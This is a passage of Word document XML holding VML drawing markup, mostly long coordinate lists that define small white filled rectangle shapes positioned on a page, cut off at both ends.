5,4960,12495,4960,12495,4960,12495,4959,12495,4959,12495,4959,12495,4959,12495,4958,12495,4958,12495,4958,12495,4958,12495,4957,12495,4957,12495,4957,12495,4956,12495,4956,12495,4955,12495,4955,12495,4955,12495,4954,12495,4954,12495,4953,12495,4953,12495,4952,12495,4951,12495,4951,12495,4950,12495,4950,12495,4949,12495,4948,12495,4948,12495,4947,12495,4946,12495,4945,12495,4945,12495,4944,12495,4943,12495,4942,12495,4941,12495,4940,12495,4939,12495,4938,12495,4937,12495,4936,12495,4935,12495,4934,12495,4933,12495,4931,12495,4930,12495,4929,12495,4928,12495,4926,12495,4925,12495,4924,12495,4922,12495,4921,12495,4919,12495,4918,12495,4916,12495,4915,12495,4913,12495,4911,12495,4910,12495,4908,12495,4906,12495,4904,12495,4902,12495,4900,12495,4898,12495,4896,12495,4894,12495,4892,12495,4890,12495,4888,12495,4886,12495,4884,12495,4881,12495,4879,12495,4877,12495,4874,12495,4872,12495,4869,12495,4867,12495,4864,12495,4861,12495,4859,12495,4856,12495,4853,12495,4850,12495,4847,12495,4844,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12495,4841,12494,4841,12494,4841,12494,4841,12494,4841,12494,4841,12493,4841,12493,4841,12493,4841,12493,4841,12492,4841,12492,4841,12492,4841,12491,4841,12491,4841,12490,4841,12490,4841,12489,4841,12489,4841,12488,4841,12488,4841,12487,4841,12486,4841,12486,4841,12485,4841,12484,4841,12483,4841,12482,4841,12481,4841,12481,4841,12480,4841,12479,4841,12477,4841,12476,4841,12475,4841,12474,4841,12473,4841,12471,4841,12470,4841,12469,4841,12467,4841,12466,4841,12464,4841,12463,4841,12461,4841,12459,4841,12457,4841,12456,4841,12454,4841,12452,4841,12450,4841,12448,4841,12446,4841,12443,4841,12441,4841,12439,4841,12436,4841,12434,4841,12431,4841,12429,4841,12426,4841,12423,4841,12421,4841,12418,4841,12415,4841,12412,4841,12409,4841,12406,4841,12402,4841,12399,4841,12396,4841,12392,4841,12389,4841,12385,4841,12381,4841,12377,4841,12374,4841,12370,4841,12365,4841,12361,4841,12357,4841,12353,4841,12348,4841,12344,4841,12339,4841,12335,4841,12330,4841,12325,4841,12320,4841,12315,4841,12310,4841,12305,4841,12299,4841,12294,4841,12288,4841,12283,4841,12277,4841,12271,4841,12265,4841,12259,4841,12253,4841,12247,4841,12240e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:258.874pt;margin-top:610.874pt;width:7.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5177,12217" coordsize="142,262">
        <v:shape style="position:absolute;left:5177;top:12217;width:142;height:262" coordorigin="5177,12217" coordsize="142,262" path="m5202,12240l5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5202,12240,5203,12240,5203,12240,5203,12240,5203,12240,5203,12240,5203,12240,5204,12240,5204,12240,5204,12240,5204,12240,5204,12240,5205,12240,5205,12240,5205,12240,5206,12240,5206,12240,5206,12240,5207,12240,5207,12240,5207,12240,5208,12240,5208,12240,5209,12240,5209,12240,5209,12240,5210,12240,5211,12240,5211,12240,5212,12240,5212,12240,5213,12240,5213,12240,5214,12240,5215,12240,5216,12240,5216,12240,5217,12240,5218,12240,5219,12240,5219,12240,5220,12240,5221,12240,5222,12240,5223,12240,5224,12240,5225,12240,5226,12240,5227,12240,5228,12240,5229,12240,5230,12240,5232,12240,5233,12240,5234,12240,5235,12240,5237,12240,5238,12240,5239,12240,5241,12240,5242,12240,5244,12240,5245,12240,5247,12240,5249,12240,5250,12240,5252,12240,5254,12240,5255,12240,5257,12240,5259,12240,5261,12240,5263,12240,5265,12240,5267,12240,5269,12240,5271,12240,5273,12240,5275,12240,5277,12240,5279,12240,5282,12240,5284,12240,5286,12240,5289,12240,5291,12240,5294,12240,5296,12240,5299,12240,5302,12240,5304,12240,5307,12240,5310,12240,5313,12240,5316,12240,5319,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12240,5322,12241,5322,12241,5322,12241,5322,12241,5322,12241,5322,12241,5322,12241,5322,12242,5322,12242,5322,12242,5322,12242,5322,12243,5322,12243,5322,12243,5322,12243,5322,12244,5322,12244,5322,12245,5322,12245,5322,12246,5322,12246,5322,12247,5322,12247,5322,12248,5322,12248,5322,12249,5322,12250,5322,12251,5322,12251,5322,12252,5322,12253,5322,12254,5322,12255,5322,12256,5322,12257,5322,12258,5322,12259,5322,12260,5322,12261,5322,12263,5322,12264,5322,12265,5322,12267,5322,12268,5322,12270,5322,12271,5322,12273,5322,12275,5322,12276,5322,12278,5322,12280,5322,12282,5322,12284,5322,12286,5322,12288,5322,12290,5322,12292,5322,12294,5322,12297,5322,12299,5322,12302,5322,12304,5322,12307,5322,12309,5322,12312,5322,12315,5322,12318,5322,12321,5322,12324,5322,12327,5322,12330,5322,12333,5322,12336,5322,12340,5322,12343,5322,12347,5322,12351,5322,12354,5322,12358,5322,12362,5322,12366,5322,12370,5322,12374,5322,12378,5322,12383,5322,12387,5322,12392,5322,12396,5322,12401,5322,12406,5322,12410,5322,12415,5322,12420,5322,12426,5322,12431,5322,12436,5322,12442,5322,12447,5322,12453,5322,12459,5322,12464,5322,12470,5322,12476,5322,12483,5322,12489,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5322,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5321,12495,5320,12495,5320,12495,5320,12495,5320,12495,5320,12495,5320,12495,5319,12495,5319,12495,5319,12495,5319,12495,5318,12495,5318,12495,5318,12495,5317,12495,5317,12495,5317,12495,5316,12495,5316,12495,5316,12495,5315,12495,5315,12495,5314,12495,5314,12495,5313,12495,5313,12495,5312,12495,5312,12495,5311,12495,5310,12495,5310,12495,5309,12495,5308,12495,5308,12495,5307,12495,5306,12495,5306,12495,5305,12495,5304,12495,5303,12495,5302,12495,5301,12495,5300,12495,5299,12495,5298,12495,5297,12495,5296,12495,5295,12495,5294,12495,5293,12495,5292,12495,5290,12495,5289,12495,5288,12495,5287,12495,5285,12495,5284,12495,5282,12495,5281,12495,5279,12495,5278,12495,5276,12495,5275,12495,5273,12495,5271,12495,5270,12495,5268,12495,5266,12495,5264,12495,5263,12495,5261,12495,5259,12495,5257,12495,5255,12495,5253,12495,5250,12495,5248,12495,5246,12495,5244,12495,5242,12495,5239,12495,5237,12495,5234,12495,5232,12495,5229,12495,5227,12495,5224,12495,5222,12495,5219,12495,5216,12495,5213,12495,5210,12495,5208,12495,5205,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12495,5202,12494,5202,12494,5202,12494,5202,12494,5202,12494,5202,12493,5202,12493,5202,12493,5202,12493,5202,12492,5202,12492,5202,12492,5202,12491,5202,12491,5202,12490,5202,12490,5202,12489,5202,12489,5202,12488,5202,12488,5202,12487,5202,12486,5202,12486,5202,12485,5202,12484,5202,12483,5202,12482,5202,12481,5202,12481,5202,12480,5202,12479,5202,12477,5202,12476,5202,12475,5202,12474,5202,12473,5202,12471,5202,12470,5202,12469,5202,12467,5202,12466,5202,12464,5202,12463,5202,12461,5202,12459,5202,12457,5202,12456,5202,12454,5202,12452,5202,12450,5202,12448,5202,12446,5202,12443,5202,12441,5202,12439,5202,12436,5202,12434,5202,12431,5202,12429,5202,12426,5202,12423,5202,12421,5202,12418,5202,12415,5202,12412,5202,12409,5202,12406,5202,12402,5202,12399,5202,12396,5202,12392,5202,12389,5202,12385,5202,12381,5202,12377,5202,12374,5202,12370,5202,12365,5202,12361,5202,12357,5202,12353,5202,12348,5202,12344,5202,12339,5202,12335,5202,12330,5202,12325,5202,12320,5202,12315,5202,12310,5202,12305,5202,12299,5202,12294,5202,12288,5202,12283,5202,12277,5202,12271,5202,12265,5202,12259,5202,12253,5202,12247,5202,12240e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.874pt;margin-top:610.874pt;width:7.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6737,12217" coordsize="142,262">
        <v:shape style="position:absolute;left:6737;top:12217;width:142;height:262" coordorigin="6737,12217" coordsize="142,262" path="m6762,12240l6762,12240,6762,12240,6762,12240,6762,12240,6762,12240,6762,12240,6762,12240,6762,12240,6762,12240,6762,12240,6762,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6763,12240,6764,12240,6764,12240,6764,12240,6764,12240,6764,12240,6764,12240,6765,12240,6765,12240,6765,12240,6765,12240,6765,12240,6766,12240,6766,12240,6766,12240,6767,12240,6767,12240,6767,12240,6768,12240,6768,12240,6768,12240,6769,12240,6769,12240,6770,12240,6770,12240,6771,12240,6771,12240,6772,12240,6772,12240,6773,12240,6774,12240,6774,12240,6775,12240,6776,12240,6776,12240,6777,12240,6778,12240,6779,12240,6779,12240,6780,12240,6781,12240,6782,12240,6783,12240,6784,12240,6785,12240,6786,12240,6787,12240,6788,12240,6789,12240,6790,12240,6791,12240,6792,12240,6794,12240,6795,12240,6796,12240,6798,12240,6799,12240,6800,12240,6802,12240,6803,12240,6805,12240,6806,12240,6808,12240,6809,12240,6811,12240,6813,12240,6814,12240,6816,12240,6818,12240,6820,12240,6822,12240,6823,12240,6825,12240,6827,12240,6829,12240,6832,12240,6834,12240,6836,12240,6838,12240,6840,12240,6843,12240,6845,12240,6847,12240,6850,12240,6852,12240,6855,12240,6857,12240,6860,12240,6863,12240,6865,12240,6868,12240,6871,12240,6874,12240,6877,12240,6879,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12240,6882,12241,6882,12241,6882,12241,6882,12241,6882,12241,6882,12241,6882,12241,6882,12242,6882,12242,6882,12242,6882,12242,6882,12243,6882,12243,6882,12243,6882,12243,6882,12244,6882,12244,6882,12245,6882,12245,6882,12246,6882,12246,6882,12247,6882,12247,6882,12248,6882,12248,6882,12249,6882,12250,6882,12251,6882,12251,6882,12252,6882,12253,6882,12254,6882,12255,6882,12256,6882,12257,6882,12258,6882,12259,6882,12260,6882,12261,6882,12263,6882,12264,6882,12265,6882,12267,6882,12268,6882,12270,6882,12271,6882,12273,6882,12275,6882,12276,6882,12278,6882,12280,6882,12282,6882,12284,6882,12286,6882,12288,6882,12290,6882,12292,6882,12294,6882,12297,6882,12299,6882,12302,6882,12304,6882,12307,6882,12309,6882,12312,6882,12315,6882,12318,6882,12321,6882,12324,6882,12327,6882,12330,6882,12333,6882,12336,6882,12340,6882,12343,6882,12347,6882,12351,6882,12354,6882,12358,6882,12362,6882,12366,6882,12370,6882,12374,6882,12378,6882,12383,6882,12387,6882,12392,6882,12396,6882,12401,6882,12406,6882,12410,6882,12415,6882,12420,6882,12426,6882,12431,6882,12436,6882,12442,6882,12447,6882,12453,6882,12459,6882,12464,6882,12470,6882,12476,6882,12483,6882,12489,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6882,12495,6881,12495,6881,12495,6881,12495,6881,12495,6881,12495,6881,12495,6881,12495,6880,12495,6880,12495,6880,12495,6880,12495,6879,12495,6879,12495,6879,12495,6879,12495,6878,12495,6878,12495,6878,12495,6877,12495,6877,12495,6876,12495,6876,12495,6876,12495,6875,12495,6875,12495,6874,12495,6874,12495,6873,12495,6872,12495,6872,12495,6871,12495,6871,12495,6870,12495,6869,12495,6869,12495,6868,12495,6867,12495,6866,12495,6865,12495,6865,12495,6864,12495,6863,12495,6862,12495,6861,12495,6860,12495,6859,12495,6858,12495,6857,12495,6856,12495,6855,12495,6854,12495,6852,12495,6851,12495,6850,12495,6849,12495,6847,12495,6846,12495,6845,12495,6843,12495,6842,12495,6840,12495,6839,12495,6837,12495,6836,12495,6834,12495,6832,12495,6831,12495,6829,12495,6827,12495,6825,12495,6823,12495,6821,12495,6819,12495,6817,12495,6815,12495,6813,12495,6811,12495,6809,12495,6807,12495,6805,12495,6802,12495,6800,12495,6798,12495,6795,12495,6793,12495,6790,12495,6788,12495,6785,12495,6782,12495,6780,12495,6777,12495,6774,12495,6771,12495,6768,12495,6765,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12495,6762,12494,6762,12494,6762,12494,6762,12494,6762,12494,6762,12493,6762,12493,6762,12493,6762,12493,6762,12492,6762,12492,6762,12492,6762,12491,6762,12491,6762,12490,6762,12490,6762,12489,6762,12489,6762,12488,6762,12488,6762,12487,6762,12486,6762,12486,6762,12485,6762,12484,6762,12483,6762,12482,6762,12481,6762,12481,6762,12480,6762,12479,6762,12477,6762,12476,6762,12475,6762,12474,6762,12473,6762,12471,6762,12470,6762,12469,6762,12467,6762,12466,6762,12464,6762,12463,6762,12461,6762,12459,6762,12457,6762,12456,6762,12454,6762,12452,6762,12450,6762,12448,6762,12446,6762,12443,6762,12441,6762,12439,6762,12436,6762,12434,6762,12431,6762,12429,6762,12426,6762,12423,6762,12421,6762,12418,6762,12415,6762,12412,6762,12409,6762,12406,6762,12402,6762,12399,6762,12396,6762,12392,6762,12389,6762,12385,6762,12381,6762,12377,6762,12374,6762,12370,6762,12365,6762,12361,6762,12357,6762,12353,6762,12348,6762,12344,6762,12339,6762,12335,6762,12330,6762,12325,6762,12320,6762,12315,6762,12310,6762,12305,6762,12299,6762,12294,6762,12288,6762,12283,6762,12277,6762,12271,6762,12265,6762,12259,6762,12253,6762,12247,6762,12240e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.874pt;margin-top:645.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3377,12917" coordsize="142,282">
        <v:shape style="position:absolute;left:3377;top:12917;width:142;height:282" coordorigin="3377,12917" coordsize="142,282" path="m3416,12946l3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3416,12946,3417,12946,3417,12946,3417,12946,3417,12946,3417,12946,3417,12946,3417,12946,3418,12946,3418,12946,3418,12946,3418,12946,3419,12946,3419,12946,3419,12946,3419,12946,3420,12946,3420,12946,3420,12946,3421,12946,3421,12946,3421,12946,3422,12946,3422,12946,3423,12946,3423,12946,3424,12946,3424,12946,3425,12946,3425,12946,3426,12946,3426,12946,3427,12946,3428,12946,3428,12946,3429,12946,3430,12946,3430,12946,3431,12946,3432,12946,3433,12946,3434,12946,3434,12946,3435,12946,3436,12946,3437,12946,3438,12946,3439,12946,3440,12946,3441,12946,3442,12946,3443,12946,3445,12946,3446,12946,3447,12946,3448,12946,3450,12946,3451,12946,3452,12946,3454,12946,3455,12946,3456,12946,3458,12946,3459,12946,3461,12946,3463,12946,3464,12946,3466,12946,3468,12946,3469,12946,3471,12946,3473,12946,3475,12946,3477,12946,3479,12946,3481,12946,3483,12946,3485,12946,3487,12946,3489,12946,3491,12946,3494,12946,3496,12946,3498,12946,3501,12946,3503,12946,3505,12946,3508,12946,3511,12946,3513,12946,3516,12946,3519,12946,3521,12946,3524,12946,3527,12946,3530,12946,3533,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12946,3536,12947,3536,12947,3536,12947,3536,12947,3536,12947,3536,12948,3536,12948,3536,12948,3536,12949,3536,12949,3536,12949,3536,12950,3536,12950,3536,12950,3536,12951,3536,12951,3536,12952,3536,12953,3536,12953,3536,12954,3536,12955,3536,12955,3536,12956,3536,12957,3536,12958,3536,12958,3536,12959,3536,12960,3536,12961,3536,12962,3536,12963,3536,12964,3536,12966,3536,12967,3536,12968,3536,12969,3536,12971,3536,12972,3536,12974,3536,12975,3536,12977,3536,12978,3536,12980,3536,12982,3536,12983,3536,12985,3536,12987,3536,12989,3536,12991,3536,12993,3536,12995,3536,12997,3536,13000,3536,13002,3536,13004,3536,13007,3536,13009,3536,13012,3536,13015,3536,13017,3536,13020,3536,13023,3536,13026,3536,13029,3536,13032,3536,13035,3536,13038,3536,13042,3536,13045,3536,13049,3536,13052,3536,13056,3536,13060,3536,13063,3536,13067,3536,13071,3536,13075,3536,13079,3536,13084,3536,13088,3536,13092,3536,13097,3536,13102,3536,13106,3536,13111,3536,13116,3536,13121,3536,13126,3536,13131,3536,13136,3536,13142,3536,13147,3536,13153,3536,13158,3536,13164,3536,13170,3536,13176,3536,13182,3536,13188,3536,13194,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3536,13201,3535,13201,3535,13201,3535,13201,3535,13201,3535,13201,3535,13201,3535,13201,3535,13201,3535,13201,3535,13201,3535,13201,3534,13201,3534,13201,3534,13201,3534,13201,3534,13201,3533,13201,3533,13201,3533,13201,3533,13201,3532,13201,3532,13201,3532,13201,3532,13201,3531,13201,3531,13201,3531,13201,3530,13201,3530,13201,3529,13201,3529,13201,3528,13201,3528,13201,3527,13201,3527,13201,3526,13201,3526,13201,3525,13201,3525,13201,3524,13201,3523,13201,3523,13201,3522,13201,3521,13201,3520,13201,3520,13201,3519,13201,3518,13201,3517,13201,3516,13201,3515,13201,3514,13201,3513,13201,3512,13201,3511,13201,3510,13201,3509,13201,3508,13201,3507,13201,3506,13201,3505,13201,3503,13201,3502,13201,3501,13201,3499,13201,3498,13201,3496,13201,3495,13201,3494,13201,3492,13201,3490,13201,3489,13201,3487,13201,3486,13201,3484,13201,3482,13201,3480,13201,3478,13201,3477,13201,3475,13201,3473,13201,3471,13201,3469,13201,3467,13201,3465,13201,3462,13201,3460,13201,3458,13201,3456,13201,3453,13201,3451,13201,3449,13201,3446,13201,3444,13201,3441,13201,3438,13201,3436,13201,3433,13201,3430,13201,3427,13201,3425,13201,3422,13201,3419,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13201,3416,13200,3416,13200,3416,13200,3416,13200,3416,13200,3416,13200,3416,13200,3416,13200,3416,13200,3416,13199,3416,13199,3416,13199,3416,13199,3416,13199,3416,13198,3416,13198,3416,13198,3416,13197,3416,13197,3416,13197,3416,13196,3416,13196,3416,13195,3416,13195,3416,13194,3416,13194,3416,13193,3416,13192,3416,13192,3416,13191,3416,13190,3416,13189,3416,13189,3416,13188,3416,13187,3416,13186,3416,13185,3416,13184,3416,13183,3416,13182,3416,13181,3416,13179,3416,13178,3416,13177,3416,13175,3416,13174,3416,13173,3416,13171,3416,13170,3416,13168,3416,13166,3416,13165,3416,13163,3416,13161,3416,13159,3416,13157,3416,13155,3416,13153,3416,13151,3416,13149,3416,13146,3416,13144,3416,13142,3416,13139,3416,13137,3416,13134,3416,13132,3416,13129,3416,13126,3416,13123,3416,13120,3416,13117,3416,13114,3416,13111,3416,13108,3416,13104,3416,13101,3416,13097,3416,13094,3416,13090,3416,13087,3416,13083,3416,13079,3416,13075,3416,13071,3416,13067,3416,13062,3416,13058,3416,13054,3416,13049,3416,13045,3416,13040,3416,13035,3416,13030,3416,13025,3416,13020,3416,13015,3416,13010,3416,13005,3416,12999,3416,12994,3416,12988,3416,12982,3416,12976,3416,12970,3416,12964,3416,12958,3416,12952,3416,12946e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:222.874pt;margin-top:664.874pt;width:7.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4457,13297" coordsize="142,262">
        <v:shape style="position:absolute;left:4457;top:13297;width:142;height:262" coordorigin="4457,13297" coordsize="142,262" path="m4496,13321l4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4496,13321,4497,13321,4497,13321,4497,13321,4497,13321,4497,13321,4497,13321,4497,13321,4497,13321,4497,13321,4497,13321,4497,13321,4498,13321,4498,13321,4498,13321,4498,13321,4498,13321,4498,13321,4499,13321,4499,13321,4499,13321,4499,13321,4500,13321,4500,13321,4500,13321,4500,13321,4501,13321,4501,13321,4502,13321,4502,13321,4502,13321,4503,13321,4503,13321,4504,13321,4504,13321,4505,13321,4505,13321,4506,13321,4506,13321,4507,13321,4507,13321,4508,13321,4509,13321,4509,13321,4510,13321,4511,13321,4512,13321,4512,13321,4513,13321,4514,13321,4515,13321,4516,13321,4517,13321,4518,13321,4519,13321,4520,13321,4521,13321,4522,13321,4523,13321,4524,13321,4525,13321,4526,13321,4528,13321,4529,13321,4530,13321,4531,13321,4533,13321,4534,13321,4536,13321,4537,13321,4538,13321,4540,13321,4542,13321,4543,13321,4545,13321,4546,13321,4548,13321,4550,13321,4552,13321,4554,13321,4555,13321,4557,13321,4559,13321,4561,13321,4563,13321,4565,13321,4568,13321,4570,13321,4572,13321,4574,13321,4576,13321,4579,13321,4581,13321,4584,13321,4586,13321,4589,13321,4591,13321,4594,13321,4596,13321,4599,13321,4602,13321,4605,13321,4607,13321,4610,13321,4613,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13321,4616,13322,4616,13322,4616,13322,4616,13322,4616,13322,4616,13323,4616,13323,4616,13323,4616,13323,4616,13324,4616,13324,4616,13324,4616,13325,4616,13325,4616,13326,4616,13326,4616,13327,4616,13327,4616,13328,4616,13328,4616,13329,4616,13330,4616,13330,4616,13331,4616,13332,4616,13333,4616,13334,4616,13335,4616,13335,4616,13336,4616,13337,4616,13339,4616,13340,4616,13341,4616,13342,4616,13343,4616,13345,4616,13346,4616,13347,4616,13349,4616,13350,4616,13352,4616,13353,4616,13355,4616,13357,4616,13359,4616,13360,4616,13362,4616,13364,4616,13366,4616,13368,4616,13370,4616,13373,4616,13375,4616,13377,4616,13380,4616,13382,4616,13385,4616,13387,4616,13390,4616,13393,4616,13395,4616,13398,4616,13401,4616,13404,4616,13407,4616,13410,4616,13414,4616,13417,4616,13420,4616,13424,4616,13427,4616,13431,4616,13435,4616,13439,4616,13442,4616,13446,4616,13451,4616,13455,4616,13459,4616,13463,4616,13468,4616,13472,4616,13477,4616,13481,4616,13486,4616,13491,4616,13496,4616,13501,4616,13506,4616,13511,4616,13517,4616,13522,4616,13528,4616,13533,4616,13539,4616,13545,4616,13551,4616,13557,4616,13563,4616,13569,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4616,13576,4615,13576,4615,13576,4615,13576,4615,13576,4615,13576,4615,13576,4615,13576,4614,13576,4614,13576,4614,13576,4614,13576,4614,13576,4613,13576,4613,13576,4613,13576,4612,13576,4612,13576,4612,13576,4611,13576,4611,13576,4611,13576,4610,13576,4610,13576,4609,13576,4609,13576,4608,13576,4608,13576,4607,13576,4607,13576,4606,13576,4606,13576,4605,13576,4604,13576,4604,13576,4603,13576,4602,13576,4602,13576,4601,13576,4600,13576,4599,13576,4599,13576,4598,13576,4597,13576,4596,13576,4595,13576,4594,13576,4593,13576,4592,13576,4591,13576,4590,13576,4589,13576,4587,13576,4586,13576,4585,13576,4584,13576,4583,13576,4581,13576,4580,13576,4578,13576,4577,13576,4576,13576,4574,13576,4573,13576,4571,13576,4569,13576,4568,13576,4566,13576,4564,13576,4563,13576,4561,13576,4559,13576,4557,13576,4555,13576,4553,13576,4551,13576,4549,13576,4547,13576,4545,13576,4543,13576,4541,13576,4538,13576,4536,13576,4534,13576,4531,13576,4529,13576,4527,13576,4524,13576,4521,13576,4519,13576,4516,13576,4514,13576,4511,13576,4508,13576,4505,13576,4502,13576,4499,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13576,4496,13575,4496,13575,4496,13575,4496,13575,4496,13575,4496,13575,4496,13575,4496,13574,4496,13574,4496,13574,4496,13574,4496,13573,4496,13573,4496,13573,4496,13573,4496,13572,4496,13572,4496,13571,4496,13571,4496,13570,4496,13570,4496,13569,4496,13569,4496,13568,4496,13568,4496,13567,4496,13566,4496,13565,4496,13565,4496,13564,4496,13563,4496,13562,4496,13561,4496,13560,4496,13559,4496,13558,4496,13557,4496,13556,4496,13555,4496,13553,4496,13552,4496,13551,4496,13549,4496,13548,4496,13546,4496,13545,4496,13543,4496,13541,4496,13540,4496,13538,4496,13536,4496,13534,4496,13532,4496,13530,4496,13528,4496,13526,4496,13524,4496,13522,4496,13519,4496,13517,4496,13514,4496,13512,4496,13509,4496,13507,4496,13504,4496,13501,4496,13498,4496,13495,4496,13492,4496,13489,4496,13486,4496,13483,4496,13480,4496,13476,4496,13473,4496,13469,4496,13465,4496,13462,4496,13458,4496,13454,4496,13450,4496,13446,4496,13442,4496,13438,4496,13433,4496,13429,4496,13424,4496,13420,4496,13415,4496,13410,4496,13406,4496,13401,4496,13396,4496,13390,4496,13385,4496,13380,4496,13374,4496,13369,4496,13363,4496,13357,4496,13352,4496,13346,4496,13340,4496,13333,4496,13327,4496,13321e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.874pt;margin-top:682.874pt;width:7.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3377,13657" coordsize="142,262">
        <v:shape style="position:absolute;left:3377;top:13657;width:142;height:262" coordorigin="3377,13657" coordsize="142,262" path="m3416,13681l3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3416,13681,3417,13681,3417,13681,3417,13681,3417,13681,3417,13681,3417,13681,3417,13681,3418,13681,3418,13681,3418,13681,3418,13681,3419,13681,3419,13681,3419,13681,3419,13681,3420,13681,3420,13681,3420,13681,3421,13681,3421,13681,3421,13681,3422,13681,3422,13681,3423,13681,3423,13681,3424,13681,3424,13681,3425,13681,3425,13681,3426,13681,3426,13681,3427,13681,3428,13681,3428,13681,3429,13681,3430,13681,3430,13681,3431,13681,3432,13681,3433,13681,3434,13681,3434,13681,3435,13681,3436,13681,3437,13681,3438,13681,3439,13681,3440,13681,3441,13681,3442,13681,3443,13681,3445,13681,3446,13681,3447,13681,3448,13681,3450,13681,3451,13681,3452,13681,3454,13681,3455,13681,3456,13681,3458,13681,3459,13681,3461,13681,3463,13681,3464,13681,3466,13681,3468,13681,3469,13681,3471,13681,3473,13681,3475,13681,3477,13681,3479,13681,3481,13681,3483,13681,3485,13681,3487,13681,3489,13681,3491,13681,3494,13681,3496,13681,3498,13681,3501,13681,3503,13681,3505,13681,3508,13681,3511,13681,3513,13681,3516,13681,3519,13681,3521,13681,3524,13681,3527,13681,3530,13681,3533,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13681,3536,13682,3536,13682,3536,13682,3536,13682,3536,13682,3536,13682,3536,13683,3536,13683,3536,13683,3536,13683,3536,13684,3536,13684,3536,13684,3536,13685,3536,13685,3536,13685,3536,13686,3536,13686,3536,13687,3536,13687,3536,13688,3536,13689,3536,13689,3536,13690,3536,13691,3536,13691,3536,13692,3536,13693,3536,13694,3536,13695,3536,13696,3536,13697,3536,13698,3536